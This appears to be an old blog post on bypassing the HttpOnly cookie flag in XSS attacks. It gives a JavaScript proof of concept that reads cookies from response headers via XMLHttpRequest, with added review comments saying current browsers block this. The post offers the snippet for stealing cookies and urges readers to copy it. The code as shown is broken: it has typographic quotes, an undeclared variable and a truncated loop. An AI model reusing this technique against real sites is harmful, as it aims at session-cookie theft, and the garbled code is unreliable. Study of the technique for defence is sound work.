I remember well a couple of days ago when I read about this subject on ha.ckers.org; in the first moments I thought it would be secure, but after the first three lines I realized that the only difference it made was the length of the XSS code.
For those who have trouble finding the equivalent of document.cookie in Ajax, here is the PoC (answer):
// Legacy (circa 2007) proof of concept that tried to read HttpOnly cookies by
// issuing a same-origin HEAD request and scraping the raw response headers via
// XMLHttpRequest.getAllResponseHeaders(). It only works if the browser exposes
// the Set-Cookie response header to script; the XMLHttpRequest/Fetch standards
// now list Set-Cookie and Set-Cookie2 as forbidden response header names, so
// current browsers do not return them here and the HttpOnly flag remains
// effective against this technique. The defensive takeaway is browser-side:
// HttpOnly is only as strong as the engine's header filtering.
//
// As rendered on the page the snippet is not runnable as-is: the string
// literals use typographic quotes (” “) rather than ASCII quotes, the two
// guards below test `req` although the request object is stored in `doc`,
// and the for-loop header further down was truncated by the page markup.
var doc;
try { doc = new XMLHttpRequest(); } catch(e) {}
// NOTE(review): `req` is never declared in this snippet, so these guards read
// an undeclared name (outside any try block) instead of checking `doc`.
if (!req) try { doc = new ActiveXObject(”Msxml2.XMLHTTP”); } catch(e) {}
// Two statements share this line: the second IE fallback, then an async HEAD
// request to the current page URL (same origin, so cookies are attached).
if (!req) try { doc = new ActiveXObject(”Microsoft.XMLHTTP”); } catch(e) {}doc.open(”HEAD”, document.location, true);
// Two statements share this line: send the request, then install the handler
// that runs once the response is available.
doc.send(null);doc.onreadystatechange=function() {
// readyState 4 == request complete.
if(doc.readyState==4) {
if(doc.status==200) {
// Accumulates the fragments extracted from the header text.
var hidden=””;
// Splits the whole raw header string on single spaces; note this does not
// isolate Set-Cookie lines, every header value is chopped the same way.
var headers=doc.getAllResponseHeaders().split(” “);
// Loop header truncated by the page rendering (condition and increment are
// missing). `i` is also assigned without var, i.e. an implicit global.
for(i=0;i
// Because the pieces were already split on spaces, indexOf(” “) is -1 here and
// off1 is 0 for every piece; off2 points one past the first ';' (0 if none).
var off1 = headers[i].indexOf(” “)+1;
var off2 = headers[i].indexOf(”;”)+1;
var cookie=headers[i].substring(off1, off2);
hidden=hidden+cookie+” “;
}
}
// Runs for any completed request, including non-200 responses, in which case
// `hidden` is still the empty string.
alert(”httpOnly cookie: “+hidden);
}
}
Copy-paste the above snippet of code, because in the “years” to come it may be the only way to get cookies.